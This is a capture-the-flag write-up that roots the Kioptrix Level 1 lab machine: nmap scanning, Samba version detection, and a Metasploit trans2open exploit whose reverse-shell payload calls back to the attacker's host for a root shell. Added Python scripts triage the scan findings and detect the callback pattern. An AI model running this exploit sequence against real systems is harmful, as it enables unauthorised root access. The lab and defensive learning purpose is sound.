Vulnhub Kioptrix Level 1 (OSCP-like machine) writeup, for those looking to root this machine.
CTFs are fun and great for learning. Today we are solving a very simple CTF called Kioptrix Level 1; the machine can be downloaded from This Link. Since the machine is beginner level and appears on many lists of OSCP-like machines, here is a detailed writeup.
I am adding the machine IP to the hosts file; from here on I will refer to it by the hostname koptrix_1.vulnhub instead of the IP (almost) everywhere.
┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1]
└─$ sudo gedit /etc/hosts
I am running a simple nmap scan first, then one with a few more options to get port and service details.
┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1]
└─$ nmap koptrix_1.vulnhub
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 13:22 IST
Nmap scan report for koptrix_1.vulnhub (192.168.252.129)
Host is up (0.0094s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
32768/tcp open  filenet-tms

Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds
┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1]
└─$ sudo nmap -sV -sC -A -O -T5 -p- koptrix_1.vulnhub -oA koptrix1 -vv
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 11:57 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:57
Completed NSE at 11:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:57
Completed NSE at 11:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:57
Completed NSE at 11:57, 0.00s elapsed
Initiating ARP Ping Scan at 11:57
Scanning koptrix_1.vulnhub (192.168.252.129) [1 port]
Completed ARP Ping Scan at 11:57, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:57
Scanning koptrix_1.vulnhub (192.168.252.129) [65535 ports]
Discovered open port 111/tcp on 192.168.252.129
Discovered open port 139/tcp on 192.168.252.129
Discovered open port 22/tcp on 192.168.252.129
Discovered open port 443/tcp on 192.168.252.129
Discovered open port 80/tcp on 192.168.252.129
Discovered open port 32768/tcp on 192.168.252.129
Completed SYN Stealth Scan at 11:57, 6.05s elapsed (65535 total ports)
Initiating Service scan at 11:57
Scanning 6 services on koptrix_1.vulnhub (192.168.252.129)
Completed Service scan at 11:57, 6.07s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against koptrix_1.vulnhub (192.168.252.129)
NSE: Script scanning 192.168.252.129.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:57
NSE Timing: About 99.88% done; ETC: 11:58 (0:00:00 remaining)
Completed NSE at 11:58, 50.75s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:58
Completed NSE at 11:58, 0.30s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:58
Completed NSE at 11:58, 0.01s elapsed
Nmap scan report for koptrix_1.vulnhub (192.168.252.129)
Host is up, received arp-response (0.0020s latency).
Scanned at 2021-05-26 11:57:21 IST for 65s
Not shown: 65529 closed ports
Reason: 65529 resets
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|   1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_  [raw public key material omitted]
|_sshv1: Server supports SSHv1
80/tcp    open  http        syn-ack ttl 64 Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     syn-ack ttl 64 2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1          32768/tcp   status
|_  100024  1          32768/udp   status
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/emailAddress=root@localhost.localdomain/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/emailAddress=root@localhost.localdomain/localityName=SomeCity/organizationalUnitName=SomeOrganizationalUnit
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after:  2010-09-26T09:32:06
| MD5:   78ce 5293 4723 e7fe c28d 74ab 42d7 02f1
| SHA-1: 9c42 91c3 bed2 a95b 983d 10ac f766 ecb9 8766 1d33
| -----BEGIN CERTIFICATE-----
| [PEM body omitted]
|_-----END CERTIFICATE-----
|_ssl-date: 2021-05-26T06:30:19+00:00; +1m53s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
32768/tcp open  status      syn-ack ttl 64 1 (RPC #100024)
MAC Address: 00:0C:29:6E:20:7E (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
TCP/IP fingerprint: [raw fingerprint omitted]
Uptime guess: 0.004 days (since Wed May 26 11:52:14 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: 1m52s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   MYGROUP<00>          Flags: <group><active>
|   MYGROUP<1e>          Flags: <group><active>
|_  Statistics: [all zeros, omitted]
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 40101/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 30957/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 35852/udp): CLEAN (Failed to receive data)
|   Check 4 (port 14853/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   1.97 ms koptrix_1.vulnhub (192.168.252.129)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:58
Completed NSE at 11:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:58
Completed NSE at 11:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:58
Completed NSE at 11:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.18 seconds
           Raw packets sent: 65555 (2.885MB) | Rcvd: 65551 (2.623MB)
There are a few very interesting entries, such as the Apache 1.3.20 / mod_ssl 2.8.4 version on port 80 and Samba on port 139. Let's check SMB further.
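From the defender's side, the scan above already lists several things to fix before anyone reaches the Samba step. The following script is an added example (not from the original post and not part of nmap): it parses a constructed excerpt of the output shown above and flags the legacy findings together with the change an administrator would make; the cut-off date used for certificate expiry is the scan date.

```python
import re
from datetime import datetime

# Constructed excerpt of the nmap -sV/-sC output from the scan above.
SCAN_EXCERPT = """\
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after:  2010-09-26T09:32:06
| sslv2:
|   SSLv2 supported
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Group nmap's normal output into {port: {service, version, notes}}."""
    findings, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            findings[current] = {"service": m.group(2),
                                 "version": m.group(3).strip(), "notes": []}
        elif current is not None and line.startswith("|"):
            # NSE script lines belong to the port line above them.
            findings[current]["notes"].append(line.lstrip("|_ ").strip())
    return findings


def triage(findings, now=datetime(2021, 5, 26)):
    """Return [(port, code, advice)] for what a defender should fix first."""
    issues = []
    for port, f in sorted(findings.items()):
        notes, ver = f["notes"], f["version"]
        joined = " ".join(notes)
        if "Server supports SSHv1" in joined:
            issues.append((port, "sshv1", "disable protocol 1 (Protocol 2 in sshd_config)"))
        if "Potentially risky methods: TRACE" in joined:
            issues.append((port, "trace", "set TraceEnable off"))
        if re.search(r"Apache(?: httpd)?[ /]1\.3\.", ver):
            issues.append((port, "apache13", "Apache 1.3.x is end-of-life; upgrade"))
        if "OpenSSL/0.9." in ver:
            issues.append((port, "openssl09", "OpenSSL 0.9.x is end-of-life; upgrade"))
        if "SSLv2 supported" in joined:
            issues.append((port, "sslv2", "disable SSLv2 (and SSLv3) in the TLS config"))
        if "md5WithRSAEncryption" in joined:
            issues.append((port, "md5sig", "reissue the certificate with SHA-256"))
        for n in notes:
            if n.startswith("Not valid after:"):
                expiry = datetime.fromisoformat(n.split(":", 1)[1].strip())
                if expiry < now:
                    issues.append((port, "expired", f"certificate expired {expiry.date()}"))
        if f["service"] == "netbios-ssn" and "Samba" in ver and not re.search(r"\d\.\d", ver):
            issues.append((port, "smbver", "nmap gave no Samba version; fingerprint it separately"))
    return issues


if __name__ == "__main__":
    for port, code, advice in triage(parse_ports(SCAN_EXCERPT)):
        print(f"{port:>5}/tcp  {code:<9} {advice}")
```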
To get the SMB version of the machine with Metasploit, first fire up msfconsole and run auxiliary/scanner/smb/smb_version.
┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/koptrix1]
└─$ msfconsole

       =[ metasploit v6.0.45-dev                          ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS  1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_version) > set rhosts koptrix_1.vulnhub
rhosts => koptrix_1.vulnhub
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.252.129:139   - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.252.129:139   -   Host could not be identified: Unix (Samba 2.2.1a)
[*] koptrix_1.vulnhub:    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So we now know the Samba version running is 2.2.1a. We will search for exploits for it using searchsploit, or simply search within Metasploit.
msf6 auxiliary(scanner/smb/smb_version) > search samba 2.2

Matching Modules
================

   #  Name                              Disclosure Date  Rank     Check  Description
   -  ----                              ---------------  ----     -----  -----------
   0  exploit/multi/samba/nttrans       2003-04-07       average  No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   1  exploit/freebsd/samba/trans2open  2003-04-07       great    No     Samba trans2open Overflow (*BSD x86)
   2  exploit/linux/samba/trans2open    2003-04-07       great    No     Samba trans2open Overflow (Linux x86)
   3  exploit/osx/samba/trans2open      2003-04-07       great    No     Samba trans2open Overflow (Mac OS X PPC)
   4  exploit/solaris/samba/trans2open  2003-04-07       great    No     Samba trans2open Overflow (Solaris SPARC)

Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/trans2open
So we have some exploits for Samba 2.2; let's also search for trans2open, then set the payload and options.
msf6 auxiliary(scanner/smb/smb_version) > search trans2open

Matching Modules
================

   #  Name                              Disclosure Date  Rank   Check  Description
   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)

Interact with a module by name or index. For example info 3, use 3 or use exploit/solaris/samba/trans2open

msf6 auxiliary(scanner/smb/smb_version) > use exploit/linux/samba/trans2open
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/trans2open) > search samba 2.2

Matching Modules
================

   #  Name                              Disclosure Date  Rank     Check  Description
   -  ----                              ---------------  ----     -----  -----------
   0  exploit/multi/samba/nttrans       2003-04-07       average  No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   1  exploit/freebsd/samba/trans2open  2003-04-07       great    No     Samba trans2open Overflow (*BSD x86)
   2  exploit/linux/samba/trans2open    2003-04-07       great    No     Samba trans2open Overflow (Linux x86)
   3  exploit/osx/samba/trans2open      2003-04-07       great    No     Samba trans2open Overflow (Mac OS X PPC)
   4  exploit/solaris/samba/trans2open  2003-04-07       great    No     Samba trans2open Overflow (Solaris SPARC)

Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/trans2open

msf6 exploit(linux/samba/trans2open) > use exploit/linux/samba/trans2open
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
We have to configure the options for the exploit: check the existing options by typing options, and set the remote host (rhosts) with set rhosts koptrix_1.vulnhub.
msf6 exploit(linux/samba/trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.252.130  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

msf6 exploit(linux/samba/trans2open) > set rhosts koptrix_1.vulnhub
rhosts => koptrix_1.vulnhub
msf6 exploit(linux/samba/trans2open) > options

Module options (exploit/linux/samba/trans2open):

   Name    Current Setting    Required  Description
   ----    ---------------    --------  -----------
   RHOSTS  koptrix_1.vulnhub  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139                yes       The target port (TCP)

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.252.130  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
Use an appropriate payload for successful exploitation; list the compatible ones with show payloads and pick one.
msf6 exploit(linux/samba/trans2open) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x86/adduser                                          normal  No     Linux Add User
   6   payload/linux/x86/chmod                                            normal  No     Linux Chmod
   7   payload/linux/x86/exec                                             normal  No     Linux Execute Command
   8   payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   9   payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   10  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   11  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   12  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   13  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   14  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   15  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   16  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   17  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   18  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   19  payload/linux/x86/read_file                                        normal  No     Linux Read File
   20  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   23  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   27  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   28  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   29  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   30  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   31  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   32  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   33  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

[-] The value specified for payload is not valid.
msf6 exploit(linux/samba/trans2open) > set payload payload/linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
We check whether the options are set for the payload with options or show options; we can see that by default the payload is configured to execute /bin/sh.
msf6 exploit(linux/samba/trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name    Current Setting    Required  Description
   ----    ---------------    --------  -----------
   RHOSTS  koptrix_1.vulnhub  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139                yes       The target port (TCP)

Payload options (linux/x86/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST  192.168.252.130  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
Now let's run (or exploit).
msf6 exploit(linux/samba/trans2open) > run

[*] Started reverse TCP handler on 192.168.252.130:4444
[*] 192.168.252.129:139 - Trying return address 0xbffffdfc...
[*] 192.168.252.129:139 - Trying return address 0xbffffcfc...
[*] 192.168.252.129:139 - Trying return address 0xbffffbfc...
[*] 192.168.252.129:139 - Trying return address 0xbffffafc...
[*] 192.168.252.129:139 - Trying return address 0xbffff9fc...
[*] 192.168.252.129:139 - Trying return address 0xbffff8fc...
[*] Command shell session 1 opened (192.168.252.130:4444 -> 192.168.252.129:32779) at 2021-05-26 12:54:25 +0530
[*] Command shell session 2 opened (192.168.252.130:4444 -> 192.168.252.129:32780) at 2021-05-26 12:54:26 +0530
[*] Command shell session 3 opened (192.168.252.130:4444 -> 192.168.252.129:32781) at 2021-05-26 12:54:28 +0530

whoami
root
ls
pwd
/tmp
cd ..
ls
bin  boot  dev  etc  home  initrd  lib  lost+found  misc  mnt  opt  proc  root  sbin  tmp  usr  var
So we are now root on Kioptrix 1, as is evident from whoami.
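The run output above is also a useful detection case: the exploit brute-forces return addresses with one SMB connection per attempt, and each hit makes the server connect back to the attacker on port 4444, three times here. The following script is an added example, not part of the original post: it runs over constructed flow records modelled on that session (addresses, callback ports and timestamps as in the writeup; the source ports of the inbound attempts and the benign trailing flows are assumed) and alerts when a host that just took a burst of SMB connections from a peer opens an outbound connection back to that same peer on a port outside an egress allowlist.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records modelled on the session above (not real logs):
# six exploit attempts against 139, three callbacks to 4444, then benign traffic.
FLOWS = """\
2021-05-26T12:54:19 TCP 192.168.252.130:45001 -> 192.168.252.129:139
2021-05-26T12:54:20 TCP 192.168.252.130:45002 -> 192.168.252.129:139
2021-05-26T12:54:21 TCP 192.168.252.130:45003 -> 192.168.252.129:139
2021-05-26T12:54:22 TCP 192.168.252.130:45004 -> 192.168.252.129:139
2021-05-26T12:54:23 TCP 192.168.252.130:45005 -> 192.168.252.129:139
2021-05-26T12:54:24 TCP 192.168.252.130:45006 -> 192.168.252.129:139
2021-05-26T12:54:25 TCP 192.168.252.129:32779 -> 192.168.252.130:4444
2021-05-26T12:54:26 TCP 192.168.252.129:32780 -> 192.168.252.130:4444
2021-05-26T12:54:28 TCP 192.168.252.129:32781 -> 192.168.252.130:4444
2021-05-26T12:55:10 TCP 192.168.252.140:51000 -> 192.168.252.129:139
2021-05-26T12:55:11 TCP 192.168.252.129:32790 -> 192.168.252.1:53
"""

LINE_RE = re.compile(r"^(\S+) TCP (\S+):(\d+) -> (\S+):(\d+)$")
SMB_PORTS = {139, 445}
ALLOWED_EGRESS = {53, 80, 123, 443}   # ports a file server is expected to reach out on
WINDOW = timedelta(seconds=60)        # how long an inbound burst counts as "recent"
MIN_SMB_ATTEMPTS = 3                  # one real client session never needs this many


def parse_flows(text):
    """Return [(timestamp, src, sport, dst, dport)] from the constructed format."""
    flows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, sport, dst, dport = m.groups()
            flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return flows


def detect_smb_callbacks(flows):
    """Alert when a host that just took a burst of SMB connections from a peer
    opens an outbound TCP connection back to that peer on a non-allowlisted port."""
    smb_inbound = defaultdict(list)   # (server, client) -> timestamps of SMB connects
    alerts = {}
    for ts, src, sport, dst, dport in sorted(flows):
        if dport in SMB_PORTS:
            smb_inbound[(dst, src)].append(ts)
            continue
        if dport in ALLOWED_EGRESS:
            continue
        # Outbound from src to dst: did dst hammer src's SMB port just before?
        recent = [t for t in smb_inbound[(src, dst)] if ts - WINDOW <= t <= ts]
        if len(recent) >= MIN_SMB_ATTEMPTS:
            alert = alerts.setdefault((src, dst), {
                "victim": src, "attacker": dst, "smb_attempts": len(recent),
                "callback_port": dport, "callbacks": []})
            alert["callbacks"].append((ts.isoformat(), sport))
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_smb_callbacks(parse_flows(FLOWS)):
        print(f"ALERT {a['victim']} -> {a['attacker']}:{a['callback_port']} "
              f"after {a['smb_attempts']} SMB connects; {len(a['callbacks'])} callbacks")
```

On the real host the same burst would also show up as repeated smbd child crashes in the Samba logs, so a crash-rate alert on smbd is a second, host-side signal for the same event.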